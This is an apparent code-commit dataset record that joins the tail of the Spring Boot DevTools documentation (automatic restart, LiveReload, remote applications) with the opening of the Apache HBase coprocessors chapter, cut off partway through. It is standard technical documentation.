applied by the devtools, see {spring-boot-devtools-module-code}\/env\/DevToolsPropertyDefaultsPostProcessor.java[DevToolsPropertyDefaultsPostProcessor].\n\n\n\n[[using-boot-devtools-restart]]\n=== Automatic Restart\nApplications that use `spring-boot-devtools` automatically restart whenever files on the classpath change.\nThis can be a useful feature when working in an IDE, as it gives a very fast feedback loop for code changes.\nBy default, any entry on the classpath that points to a folder is monitored for changes.\nNote that certain resources, such as static assets and view templates, <<using-boot-devtools-restart-exclude, do not need to restart the application>>.\n\n.Triggering a restart\n****\nAs DevTools monitors classpath resources, the only way to trigger a restart is to update the classpath.\nThe way in which you cause the classpath to be updated depends on the IDE that you are using:\n\n* In Eclipse, saving a modified file causes the classpath to be updated and triggers a restart.\n* In IntelliJ IDEA, building the project (`Build +->+ Build Project`) has the same effect.\n* If using a build plugin, running `mvn compile` for Maven or `gradle build` for Gradle will trigger a restart. \n****\n\nNOTE: As long as forking is enabled, you can also start your application by using the supported build plugins (Maven and Gradle), since DevTools needs an isolated application classloader to operate properly.\nBy default, the Gradle and Maven plugins fork the application process.\n\nTIP: Automatic restart works very well when used with LiveReload.\n<<using-boot-devtools-livereload,See the LiveReload section>> for details.\nIf you use JRebel, automatic restarts are disabled in favor of dynamic class reloading.\nOther devtools features (such as LiveReload and property overrides) can still be used.\n\nNOTE: DevTools relies on the application context's shutdown hook to close it during a restart.\nIt does not work correctly if you have disabled the shutdown hook (`SpringApplication.setRegisterShutdownHook(false)`).\n\nNOTE: When deciding if an entry on the classpath should trigger a restart when it changes, DevTools automatically ignores projects named `spring-boot`, `spring-boot-devtools`, `spring-boot-autoconfigure`, `spring-boot-actuator`, and `spring-boot-starter`.\n\nNOTE: DevTools needs to customize the `ResourceLoader` used by the `ApplicationContext`.\nIf your application provides one already, it is going to be wrapped.\nDirect override of the `getResource` method on the `ApplicationContext` is not supported.\n\n[[using-spring-boot-restart-vs-reload]]\n.Restart vs Reload\n****\nThe restart technology provided by Spring Boot works by using two classloaders.\nClasses that do not change (for example, those from third-party jars) are loaded into a _base_ classloader.\nClasses that you are actively developing are loaded into a _restart_ classloader.\nWhen the application is restarted, the _restart_ classloader is thrown away and a new one is created.\nThis approach means that application restarts are typically much faster than \"`cold starts`\", since the _base_ classloader is already available and populated.\n\nIf you find that restarts are not quick enough for your applications or you encounter classloading issues, you could consider reloading technologies such as https:\/\/jrebel.com\/software\/jrebel\/[JRebel] from ZeroTurnaround.\nThese work by rewriting classes as they are loaded to make them more amenable to reloading.\n****\n\n\n\n[[using-boot-devtools-restart-logging-condition-delta]]\n==== Logging changes in condition evaluation\nBy default, each time your application restarts, a report showing the condition evaluation delta is logged.\nThe report shows the changes to your application's auto-configuration as you make changes such as adding or removing beans and setting configuration properties.\n\nTo disable the logging of the report, set the following property:\n\n[indent=0]\n----\n\tspring.devtools.restart.log-condition-evaluation-delta=false\n----\n\n\n[[using-boot-devtools-restart-exclude]]\n==== Excluding Resources\nCertain resources do not necessarily need to trigger a restart when they are changed.\nFor example, Thymeleaf templates can be edited in-place.\nBy default, changing resources in `\/META-INF\/maven`, `\/META-INF\/resources`, `\/resources`, `\/static`, `\/public`, or `\/templates` does not trigger a restart but does trigger a <<using-boot-devtools-livereload, live reload>>.\nIf you want to customize these exclusions, you can use the configprop:spring.devtools.restart.exclude[] property.\nFor example, to exclude only `\/static` and `\/public` you would set the following property:\n\n[indent=0]\n----\n\tspring.devtools.restart.exclude=static\/**,public\/**\n----\n\nTIP: If you want to keep those defaults and _add_ additional exclusions, use the configprop:spring.devtools.restart.additional-exclude[] property instead.\n\n\n\n[[using-boot-devtools-restart-additional-paths]]\n==== Watching Additional Paths\nYou may want your application to be restarted or reloaded when you make changes to files that are not on the classpath.\nTo do so, use the configprop:spring.devtools.restart.additional-paths[] property to configure additional paths to watch for changes.\nYou can use the configprop:spring.devtools.restart.exclude[] property <<using-boot-devtools-restart-exclude, described earlier>> to control whether changes beneath the additional paths trigger a full restart or a <<using-boot-devtools-livereload, live reload>>.\n\n\n\n[[using-boot-devtools-restart-disable]]\n==== Disabling Restart\nIf you do not want to use the restart feature, you can disable it by using the configprop:spring.devtools.restart.enabled[] property.\nIn most cases, you can set this property in your `application.properties` (doing so still initializes the restart classloader, but it does not watch for file changes).\n\nIf you need to _completely_ disable restart support (for example, because it does not work with a specific library), you need to set the configprop:spring.devtools.restart.enabled[] `System` property to `false` before calling `SpringApplication.run(...)`, as shown in the following example:\n\n[source,java,indent=0]\n----\n\tpublic static void main(String[] args) {\n\t\tSystem.setProperty(\"spring.devtools.restart.enabled\", \"false\");\n\t\tSpringApplication.run(MyApp.class, args);\n\t}\n----\n\n\n\n[[using-boot-devtools-restart-triggerfile]]\n==== Using a Trigger File\nIf you work with an IDE that continuously compiles changed files, you might prefer to trigger restarts only at specific times.\nTo do so, you can use a \"`trigger file`\", which is a special file that must be modified when you want to actually trigger a restart check.\n\nNOTE: Any update to the file will trigger a check, but restart only actually occurs if Devtools has detected it has something to do.\n\nTo use a trigger file, set the configprop:spring.devtools.restart.trigger-file[] property to the name (excluding any path) of your trigger file.\nThe trigger file must appear somewhere on your classpath.\n\nFor example, if you have a project with the following structure:\n\n[indent=0]\n----\n\tsrc\n\t+- main\n\t +- resources\n\t +- .reloadtrigger\n----\n\nThen your `trigger-file` property would be:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.devtools.restart.trigger-file=.reloadtrigger\n----\n\nRestarts will now only happen when the `src\/main\/resources\/.reloadtrigger` is updated.\n\nTIP: You might want to set `spring.devtools.restart.trigger-file` as a <<using-boot-devtools-globalsettings,global setting>>, so that all your projects behave in the same way.\n\nSome IDEs have features that save you from needing to update your trigger file manually.\nhttps:\/\/spring.io\/tools[Spring Tools for Eclipse] and https:\/\/www.jetbrains.com\/idea\/[IntelliJ IDEA (Ultimate Edition)] both have such support.\nWith Spring Tools, you can use the \"`reload`\" button from the console view (as long as your `trigger-file` is named `.reloadtrigger`).\nFor IntelliJ IDEA, you can follow the https:\/\/www.jetbrains.com\/help\/idea\/spring-boot.html#application-update-policies[instructions in their documentation].\n\n\n\n[[using-boot-devtools-customizing-classload]]\n==== Customizing the Restart Classloader\nAs described earlier in the <<using-spring-boot-restart-vs-reload>> section, restart functionality is implemented by using two classloaders.\nFor most applications, this approach works well.\nHowever, it can sometimes cause classloading issues.\n\nBy default, any open project in your IDE is loaded with the \"`restart`\" classloader, and any regular `.jar` file is loaded with the \"`base`\" classloader.\nIf you work on a multi-module project, and not every module is imported into your IDE, you may need to customize things.\nTo do so, you can create a `META-INF\/spring-devtools.properties` file.\n\nThe `spring-devtools.properties` file can contain properties prefixed with `restart.exclude` and `restart.include`.\nThe `include` elements are items that should be pulled up into the \"`restart`\" classloader, and the `exclude` elements are items that should be pushed down into the \"`base`\" classloader.\nThe value of the property is a regex pattern that is applied to the classpath, as shown in the following example:\n\n[source,properties,indent=0]\n----\n\trestart.exclude.companycommonlibs=\/mycorp-common-[\\\\w\\\\d-\\.]+\\.jar\n\trestart.include.projectcommon=\/mycorp-myproj-[\\\\w\\\\d-\\.]+\\.jar\n----\n\nNOTE: All property keys must be unique.\nAs long as a property starts with `restart.include.` or `restart.exclude.` it is considered.\n\nTIP: All `META-INF\/spring-devtools.properties` from the classpath are loaded.\nYou can package files inside your project, or in the libraries that the project consumes.\n\n\n\n[[using-boot-devtools-known-restart-limitations]]\n==== Known Limitations\nRestart functionality does not work well with objects that are deserialized by using a standard `ObjectInputStream`.\nIf you need to deserialize data, you may need to use Spring's `ConfigurableObjectInputStream` in combination with `Thread.currentThread().getContextClassLoader()`.\n\nUnfortunately, several third-party libraries deserialize without considering the context classloader.\nIf you find such a problem, you need to request a fix with the original authors.\n\n\n\n[[using-boot-devtools-livereload]]\n=== LiveReload\nThe `spring-boot-devtools` module includes an embedded LiveReload server that can be used to trigger a browser refresh when a resource is changed.\nLiveReload browser extensions are freely available for Chrome, Firefox and Safari from http:\/\/livereload.com\/extensions\/[livereload.com].\n\nIf you do not want to start the LiveReload server when your application runs, you can set the configprop:spring.devtools.livereload.enabled[] property to `false`.\n\nNOTE: You can only run one LiveReload server at a time.\nBefore starting your application, ensure that no other LiveReload servers are running.\nIf you start multiple applications from your IDE, only the first has LiveReload support.\n\nWARNING: To trigger LiveReload when a file changes, <<using-boot-devtools-restart>> must be enabled.\n\n\n\n[[using-boot-devtools-globalsettings]]\n=== Global Settings\nYou can configure global devtools settings by adding any of the following files to the `$HOME\/.config\/spring-boot` folder:\n\n. `spring-boot-devtools.properties`\n. `spring-boot-devtools.yaml`\n. `spring-boot-devtools.yml`\n\nAny properties added to these file apply to _all_ Spring Boot applications on your machine that use devtools.\nFor example, to configure restart to always use a <<using-boot-devtools-restart-triggerfile, trigger file>>, you would add the following property:\n\n.~\/.config\/spring-boot\/spring-boot-devtools.properties\n[source,properties,indent=0,configprops]\n----\n\tspring.devtools.restart.trigger-file=.reloadtrigger\n----\n\nNOTE: If devtools configuration files are not found in `$HOME\/.config\/spring-boot`, the root of the `$HOME` folder is searched for the presence of a `.spring-boot-devtools.properties` file.\nThis allows you to share the devtools global configuration with applications that are on an older version of Spring Boot that does not support the `$HOME\/.config\/spring-boot` location.\n\n[NOTE]\n====\nProfiles are not supported in devtools properties\/yaml files.\n\nAny profiles activated in `.spring-boot-devtools.properties` will not affect the loading of <<spring-boot-features.adoc#boot-features-external-config-profile-specific-properties, profile-specific configuration files>>.\nProfile specific filenames (of the form `spring-boot-devtools-<profile>.properties`) and `spring.profile` sub-documents in YAML files are not supported.\n====\n\n\n\n[[configuring-file-system-watcher]]\n==== Configuring File System Watcher\n{spring-boot-devtools-module-code}\/filewatch\/FileSystemWatcher.java[FileSystemWatcher] works by polling the class changes with a certain time interval, and then waiting for a predefined quiet period to make sure there are no more changes.\nSince Spring Boot relies entirely on the IDE to compile and copy files into the location from where Spring Boot can read them, you might find that there are times when certain changes are not reflected when devtools restarts the application.\nIf you observe such problems constantly, try increasing the `spring.devtools.restart.poll-interval` and `spring.devtools.restart.quiet-period` parameters to the values that fit your development environment:\n\n[source,properties,indent=0,configprops]\n----\n\tspring.devtools.restart.poll-interval=2s\n\tspring.devtools.restart.quiet-period=1s\n----\n\nThe monitored classpath folders are now polled every 2 seconds for changes, and a 1 second quiet period is maintained to make sure there are no additional class changes.\n\n\n\n[[using-boot-devtools-remote]]\n=== Remote Applications\nThe Spring Boot developer tools are not limited to local development.\nYou can also use several features when running applications remotely.\nRemote support is opt-in as enabling it can be a security risk.\nIt should only be enabled when running on a trusted network or when secured with SSL.\nIf neither of these options is available to you, you should not use DevTools' remote support.\nYou should never enable support on a production deployment.\n\nTo enable it, you need to make sure that `devtools` is included in the repackaged archive, as shown in the following listing:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<excludeDevtools>false<\/excludeDevtools>\n\t\t\t\t<\/configuration>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nThen you need to set the configprop:spring.devtools.remote.secret[] property.\nLike any important password or secret, the value should be unique and strong such that it cannot be guessed or brute-forced.\n\nRemote devtools support is provided in two parts: a server-side endpoint that accepts connections and a client application that you run in your IDE.\nThe server component is automatically enabled when the configprop:spring.devtools.remote.secret[] property is set.\nThe client component must be launched manually.\n\n\n\n==== Running the Remote Client Application\nThe remote client application is designed to be run from within your IDE.\nYou need to run `org.springframework.boot.devtools.RemoteSpringApplication` with the same classpath as the remote project that you connect to.\nThe application's single required argument is the remote URL to which it connects.\n\nFor example, if you are using Eclipse or STS and you have a project named `my-app` that you have deployed to Cloud Foundry, you would do the following:\n\n* Select `Run Configurations...` from the `Run` menu.\n* Create a new `Java Application` \"`launch configuration`\".\n* Browse for the `my-app` project.\n* Use `org.springframework.boot.devtools.RemoteSpringApplication` as the main class.\n* Add `+++https:\/\/myapp.cfapps.io+++` to the `Program arguments` (or whatever your remote URL is).\n\nA running remote client might resemble the following listing:\n\n[indent=0,subs=\"attributes\"]\n----\n\t . ____ _ __ _ _\n\t \/\\\\ \/ ___'_ __ _ _(_)_ __ __ _ ___ _ \\ \\ \\ \\\n\t( ( )\\___ | '_ | '_| | '_ \\\/ _` | | _ \\___ _ __ ___| |_ ___ \\ \\ \\ \\\n\t \\\\\/ ___)| |_)| | | | | || (_| []::::::[] \/ -_) ' \\\/ _ \\ _\/ -_) ) ) ) )\n\t ' |____| .__|_| |_|_| |_\\__, | |_|_\\___|_|_|_\\___\/\\__\\___|\/ \/ \/ \/\n\t =========|_|==============|___\/===================================\/_\/_\/_\/\n\t :: Spring Boot Remote :: {spring-boot-version}\n\n\t2015-06-10 18:25:06.632 INFO 14938 --- [ main] o.s.b.devtools.RemoteSpringApplication : Starting RemoteSpringApplication on pwmbp with PID 14938 (\/Users\/pwebb\/projects\/spring-boot\/code\/spring-boot-project\/spring-boot-devtools\/target\/classes started by pwebb in \/Users\/pwebb\/projects\/spring-boot\/code)\n\t2015-06-10 18:25:06.671 INFO 14938 --- [ main] s.c.a.AnnotationConfigApplicationContext : Refreshing org.springframework.context.annotation.AnnotationConfigApplicationContext@2a17b7b6: startup date [Wed Jun 10 18:25:06 PDT 2015]; root of context hierarchy\n\t2015-06-10 18:25:07.043 WARN 14938 --- [ main] o.s.b.d.r.c.RemoteClientConfiguration : The connection to http:\/\/localhost:8080 is insecure. You should use a URL starting with 'https:\/\/'.\n\t2015-06-10 18:25:07.074 INFO 14938 --- [ main] o.s.b.d.a.OptionalLiveReloadServer : LiveReload server is running on port 35729\n\t2015-06-10 18:25:07.130 INFO 14938 --- [ main] o.s.b.devtools.RemoteSpringApplication : Started RemoteSpringApplication in 0.74 seconds (JVM running for 1.105)\n----\n\nNOTE: Because the remote client is using the same classpath as the real application it can directly read application properties.\nThis is how the configprop:spring.devtools.remote.secret[] property is read and passed to the server for authentication.\n\nTIP: It is always advisable to use `https:\/\/` as the connection protocol, so that traffic is encrypted and passwords cannot be intercepted.\n\nTIP: If you need to use a proxy to access the remote application, configure the `spring.devtools.remote.proxy.host` and `spring.devtools.remote.proxy.port` properties.\n\n\n\n[[using-boot-devtools-remote-update]]\n==== Remote Update\nThe remote client monitors your application classpath for changes in the same way as the <<using-boot-devtools-restart,local restart>>.\nAny updated resource is pushed to the remote application and (_if required_) triggers a restart.\nThis can be helpful if you iterate on a feature that uses a cloud service that you do not have locally.\nGenerally, remote updates and restarts are much quicker than a full rebuild and deploy cycle.\n\nOn a slower development environment, it may happen that the quiet period is not enough, and the changes in the classes may be split into batches.\nThe server is restarted after the first batch of class changes is uploaded.\nThe next batch can\u2019t be sent to the application, since the server is restarting.\n\nThis is typically manifested by a warning in the `RemoteSpringApplication` logs about failing to upload some of the classes, and a consequent retry.\nBut it may also lead to application code inconsistency and failure to restart after the first batch of changes is uploaded.\nIf you observe such problems constantly, try increasing the `spring.devtools.restart.poll-interval` and `spring.devtools.restart.quiet-period` parameters to the values that fit your development environment.\nSee the <<configuring-file-system-watcher>> section for configuring these properties.\n\nNOTE: Files are only monitored when the remote client is running.\nIf you change a file before starting the remote client, it is not pushed to the remote server.\n\n\n\n[[using-boot-packaging-for-production]]\n== Packaging Your Application for Production\nExecutable jars can be used for production deployment.\nAs they are self-contained, they are also ideally suited for cloud-based deployment.\n\nFor additional \"`production ready`\" features, such as health, auditing, and metric REST or JMX end-points, consider adding `spring-boot-actuator`.\nSee _<<production-ready-features.adoc#production-ready>>_ for details.\n\n\n\n[[using-boot-whats-next]]\n== What to Read Next\nYou should now understand how you can use Spring Boot and some best practices that you should follow.\nYou can now go on to learn about specific _<<spring-boot-features#boot-features, Spring Boot features>>_ in depth, or you could skip ahead and read about the \"`<<production-ready-features#production-ready, production ready>>`\" aspects of Spring Boot.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1004e43a44a95fa76a1d7bb9e060b9dd581bf400","subject":"HBASE-26529 Document HBASE-26524 to section of Dynamic Unloading (#3909)","message":"HBASE-26529 Document HBASE-26524 to section of Dynamic Unloading (#3909)\n\nSigned-off-by: Wellington Chevreuil <288b11feb05c8ea384dc1375c6a84157a57eeb16@apache.org>\r\nSigned-off-by: Peter Somogyi <dfe29050aae9e16fc6784bf10581623b02587478@apache.org>","repos":"ndimiduk\/hbase,mahak\/hbase,ndimiduk\/hbase,mahak\/hbase,Apache9\/hbase,Apache9\/hbase,apurtell\/hbase,ndimiduk\/hbase,mahak\/hbase,Apache9\/hbase,Apache9\/hbase,mahak\/hbase,apurtell\/hbase,ndimiduk\/hbase,ndimiduk\/hbase,Apache9\/hbase,mahak\/hbase,mahak\/hbase,apurtell\/hbase,apurtell\/hbase,mahak\/hbase,mahak\/hbase,apurtell\/hbase,ndimiduk\/hbase,mahak\/hbase,mahak\/hbase,apurtell\/hbase,Apache9\/hbase,apurtell\/hbase,Apache9\/hbase,apurtell\/hbase,ndimiduk\/hbase,Apache9\/hbase,Apache9\/hbase,apurtell\/hbase,ndimiduk\/hbase,Apache9\/hbase,ndimiduk\/hbase,apurtell\/hbase,ndimiduk\/hbase","old_file":"src\/main\/asciidoc\/_chapters\/cp.adoc","new_file":"src\/main\/asciidoc\/_chapters\/cp.adoc","new_contents":"\/\/\/\/\n\/**\n *\n * Licensed to the Apache Software Foundation (ASF) under one\n * or more contributor license agreements. See the NOTICE file\n * distributed with this work for additional information\n * regarding copyright ownership. The ASF licenses this file\n * to you under the Apache License, Version 2.0 (the\n * \"License\"); you may not use this file except in compliance\n * with the License. You may obtain a copy of the License at\n *\n * http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n *\/\n\/\/\/\/\n\n[[cp]]\n= Apache HBase Coprocessors\n:doctype: book\n:numbered:\n:toc: left\n:icons: font\n:experimental:\n\nHBase Coprocessors are modeled after Google BigTable's coprocessor implementation\n(http:\/\/research.google.com\/people\/jeff\/SOCC2010-keynote-slides.pdf pages 41-42.).\n\nThe coprocessor framework provides mechanisms for running your custom code directly on\nthe RegionServers managing your data. Efforts are ongoing to bridge gaps between HBase's\nimplementation and BigTable's architecture. For more information see\nlink:https:\/\/issues.apache.org\/jira\/browse\/HBASE-4047[HBASE-4047].\n\nThe information in this chapter is primarily sourced and heavily reused from the following\nresources:\n\n. Mingjie Lai's blog post\nlink:https:\/\/blogs.apache.org\/hbase\/entry\/coprocessor_introduction[Coprocessor Introduction].\n. Gaurav Bhardwaj's blog post\nlink:http:\/\/www.3pillarglobal.com\/insights\/hbase-coprocessors[The How To Of HBase Coprocessors].\n\n[WARNING]\n.Use Coprocessors At Your Own Risk\n====\nCoprocessors are an advanced feature of HBase and are intended to be used by system\ndevelopers only. Because coprocessor code runs directly on the RegionServer and has\ndirect access to your data, they introduce the risk of data corruption, man-in-the-middle\nattacks, or other malicious data access. Currently, there is no mechanism to prevent\ndata corruption by coprocessors, though work is underway on\nlink:https:\/\/issues.apache.org\/jira\/browse\/HBASE-4047[HBASE-4047].\n+\nIn addition, there is no resource isolation, so a well-intentioned but misbehaving\ncoprocessor can severely degrade cluster performance and stability.\n====\n\n== Coprocessor Overview\n\nIn HBase, you fetch data using a `Get` or `Scan`, whereas in an RDBMS you use a SQL\nquery. In order to fetch only the relevant data, you filter it using a HBase\nlink:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/filter\/Filter.html[Filter]\n, whereas in an RDBMS you use a `WHERE` predicate.\n\nAfter fetching the data, you perform computations on it. This paradigm works well\nfor \"small data\" with a few thousand rows and several columns. However, when you scale\nto billions of rows and millions of columns, moving large amounts of data across your\nnetwork will create bottlenecks at the network layer, and the client needs to be powerful\nenough and have enough memory to handle the large amounts of data and the computations.\nIn addition, the client code can grow large and complex.\n\nIn this scenario, coprocessors might make sense. You can put the business computation\ncode into a coprocessor which runs on the RegionServer, in the same location as the\ndata, and returns the result to the client.\n\nThis is only one scenario where using coprocessors can provide benefit. Following\nare some analogies which may help to explain some of the benefits of coprocessors.\n\n[[cp_analogies]]\n=== Coprocessor Analogies\n\nTriggers and Stored Procedure::\n An Observer coprocessor is similar to a trigger in a RDBMS in that it executes\n your code either before or after a specific event (such as a `Get` or `Put`)\n occurs. An endpoint coprocessor is similar to a stored procedure in a RDBMS\n because it allows you to perform custom computations on the data on the\n RegionServer itself, rather than on the client.\n\nMapReduce::\n MapReduce operates on the principle of moving the computation to the location of\n the data. Coprocessors operate on the same principal.\n\nAOP::\n If you are familiar with Aspect Oriented Programming (AOP), you can think of a coprocessor\n as applying advice by intercepting a request and then running some custom code,\n before passing the request on to its final destination (or even changing the destination).\n\n\n=== Coprocessor Implementation Overview\n\n. Your class should implement one of the Coprocessor interfaces -\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/Coprocessor.html[Coprocessor],\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionObserver.html[RegionObserver],\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/CoprocessorService.html[CoprocessorService] - to name a few.\n\n. Load the coprocessor, either statically (from the configuration) or dynamically,\nusing HBase Shell. For more details see <<cp_loading,Loading Coprocessors>>.\n\n. Call the coprocessor from your client-side code. HBase handles the coprocessor\ntransparently.\n\nThe framework API is provided in the\nlink:https:\/\/hbase.apache.org\/apidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/package-summary.html[coprocessor]\npackage.\n\n== Types of Coprocessors\n\n=== Observer Coprocessors\n\nObserver coprocessors are triggered either before or after a specific event occurs.\nObservers that happen before an event use methods that start with a `pre` prefix,\nsuch as link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionObserver.html#prePut-org.apache.hadoop.hbase.coprocessor.ObserverContext-org.apache.hadoop.hbase.client.Put-org.apache.hadoop.hbase.wal.WALEdit-org.apache.hadoop.hbase.client.Durability-[`prePut`]. Observers that happen just after an event override methods that start\nwith a `post` prefix, such as link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionObserver.html#postPut-org.apache.hadoop.hbase.coprocessor.ObserverContext-org.apache.hadoop.hbase.client.Put-org.apache.hadoop.hbase.wal.WALEdit-org.apache.hadoop.hbase.client.Durability-[`postPut`].\n\n\n==== Use Cases for Observer Coprocessors\nSecurity::\n Before performing a `Get` or `Put` operation, you can check for permission using\n `preGet` or `prePut` methods.\n\nReferential Integrity::\n HBase does not directly support the RDBMS concept of refential integrity, also known\n as foreign keys. You can use a coprocessor to enforce such integrity. For instance,\n if you have a business rule that every insert to the `users` table must be followed\n by a corresponding entry in the `user_daily_attendance` table, you could implement\n a coprocessor to use the `prePut` method on `user` to insert a record into `user_daily_attendance`.\n\nSecondary Indexes::\n You can use a coprocessor to maintain secondary indexes. For more information, see\n link:https:\/\/cwiki.apache.org\/confluence\/display\/HADOOP2\/Hbase+SecondaryIndexing[SecondaryIndexing].\n\n\n==== Types of Observer Coprocessor\n\nRegionObserver::\n A RegionObserver coprocessor allows you to observe events on a region, such as `Get`\n and `Put` operations. See\n link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionObserver.html[RegionObserver].\n\nRegionServerObserver::\n A RegionServerObserver allows you to observe events related to the RegionServer's\n operation, such as starting, stopping, or performing merges, commits, or rollbacks.\n See\n link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/RegionServerObserver.html[RegionServerObserver].\n\nMasterObserver::\n A MasterObserver allows you to observe events related to the HBase Master, such\n as table creation, deletion, or schema modification. See\n link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/MasterObserver.html[MasterObserver].\n\nWalObserver::\n A WalObserver allows you to observe events related to writes to the Write-Ahead\n Log (WAL). See\n link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/coprocessor\/WALObserver.html[WALObserver].\n\n<<cp_example,Examples>> provides working examples of observer coprocessors.\n\n\n\n[[cpeps]]\n=== Endpoint Coprocessor\n\nEndpoint processors allow you to perform computation at the location of the data.\nSee <<cp_analogies, Coprocessor Analogy>>. An example is the need to calculate a running\naverage or summation for an entire table which spans hundreds of regions.\n\nIn contrast to observer coprocessors, where your code is run transparently, endpoint\ncoprocessors must be explicitly invoked using the\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/client\/AsyncTable.html#coprocessorService-java.util.function.Function-org.apache.hadoop.hbase.client.ServiceCaller-byte:A-[CoprocessorService()]\nmethod available in\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/client\/AsyncTable.html[AsyncTable].\n\n[WARNING]\n.On using coprocessorService method with sync client\n====\nThe coprocessorService method in link:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/client\/Table.html[Table]\nhas been deprecated.\n\nIn link:https:\/\/issues.apache.org\/jira\/browse\/HBASE-21512[HBASE-21512]\nwe reimplement the sync client based on the async client. The coprocessorService\nmethod defined in `Table` interface directly references a method from protobuf's\n`BlockingInterface`, which means we need to use a separate thread pool to execute\nthe method so we avoid blocking the async client(We want to avoid blocking calls in\nour async implementation).\n\nSince coprocessor is an advanced feature, we believe it is OK for coprocessor users to\ninstead switch over to use `AsyncTable`. There is a lightweight\nlink:https:\/\/hbase.apache.org\/devapidocs\/org\/apache\/hadoop\/hbase\/client\/Connection.html#toAsyncConnection--[toAsyncConnection]\nmethod to get an `AsyncConnection` from `Connection` if needed.\n====\n\nStarting with HBase 0.96, endpoint coprocessors are implemented using Google Protocol\nBuffers (protobuf). For more details on protobuf, see Google's\nlink:https:\/\/developers.google.com\/protocol-buffers\/docs\/proto[Protocol Buffer Guide].\nEndpoints Coprocessor written in version 0.94 are not compatible with version 0.96 or later.\nSee\nlink:https:\/\/issues.apache.org\/jira\/browse\/HBASE-5448[HBASE-5448]). To upgrade your\nHBase cluster from 0.94 or earlier to 0.96 or later, you need to reimplement your\ncoprocessor.\n\nIn HBase 2.x, we made use of a shaded version of protobuf 3.x, but kept the\nprotobuf for coprocessors on 2.5.0. In HBase 3.0.0, we removed all dependencies on\nnon-shaded protobuf so you need to reimplement your coprocessor to make use of the\nshaded protobuf version provided in hbase-thirdparty. Please see\nthe <<protobuf,protobuf>> section for more details.\n\nCoprocessor Endpoints should make no use of HBase internals and\nonly avail of public APIs; ideally a CPEP should depend on Interfaces\nand data structures only. This is not always possible but beware\nthat doing so makes the Endpoint brittle, liable to breakage as HBase\ninternals evolve. HBase internal APIs annotated as private or evolving\ndo not have to respect semantic versioning rules or general java rules on\ndeprecation before removal. While generated protobuf files are\nabsent the hbase audience annotations -- they are created by the\nprotobuf protoc tool which knows nothing of how HBase works --\nthey should be consided `@InterfaceAudience.Private` so are liable to\nchange.\n\n<<cp_example,Examples>> provides working examples of endpoint coprocessors.\n\n[[cp_loading]]\n== Loading Coprocessors\n\nTo make your coprocessor available to HBase, it must be _loaded_, either statically\n(through the HBase configuration) or dynamically (using HBase Shell or the Java API).\n\n=== Static Loading\n\nFollow these steps to statically load your coprocessor. Keep in mind that you must\nrestart HBase to unload a coprocessor that has been loaded statically.\n\n. Define the Coprocessor in _hbase-site.xml_, with a <property> element with a <name>\nand a <value> sub-element. The <name> should be one of the following:\n+\n- `hbase.coprocessor.region.classes` for RegionObservers and Endpoints.\n- `hbase.coprocessor.wal.classes` for WALObservers.\n- `hbase.coprocessor.master.classes` for MasterObservers.\n+\n<value> must contain the fully-qualified class name of your coprocessor's implementation\nclass.\n+\nFor example to load a Coprocessor (implemented in class SumEndPoint.java) you have to create\nfollowing entry in RegionServer's 'hbase-site.xml' file (generally located under 'conf' directory):\n+\n[source,xml]\n----\n<property>\n <name>hbase.coprocessor.region.classes<\/name>\n <value>org.myname.hbase.coprocessor.endpoint.SumEndPoint<\/value>\n<\/property>\n----\n+\nIf multiple classes are specified for loading, the class names must be comma-separated.\nThe framework attempts to load all the configured classes using the default class loader.\nTherefore, the jar file must reside on the server-side HBase classpath.\n\n+\nCoprocessors which are loaded in this way will be active on all regions of all tables.\nThese are also called system Coprocessor.\nThe first listed Coprocessors will be assigned the priority `Coprocessor.Priority.SYSTEM`.\nEach subsequent coprocessor in the list will have its priority value incremented by one (which\nreduces its priority, because priorities have the natural sort order of Integers).\n\n+\nThese priority values can be manually overriden in hbase-site.xml. This can be useful if you\nwant to guarantee that a coprocessor will execute after another. For example, in the following\nconfiguration `SumEndPoint` would be guaranteed to go last, except in the case of a tie with\nanother coprocessor:\n+\n[source,xml]\n----\n<property>\n <name>hbase.coprocessor.region.classes<\/name>\n <value>org.myname.hbase.coprocessor.endpoint.SumEndPoint|2147483647<\/value>\n<\/property>\n----\n\n+\nWhen calling out to registered observers, the framework executes their callbacks methods in the\nsorted order of their priority. +\nTies are broken arbitrarily.\n\n. Put your code on HBase's classpath. One easy way to do this is to drop the jar\n (containing you code and all the dependencies) into the `lib\/` directory in the\n HBase installation.\n\n. Restart HBase.\n\n\n=== Static Unloading\n\n. Delete the coprocessor's <property> element, including sub-elements, from `hbase-site.xml`.\n. Restart HBase.\n. Optionally, remove the coprocessor's JAR file from the classpath or HBase's `lib\/`\n directory.\n\n\n=== 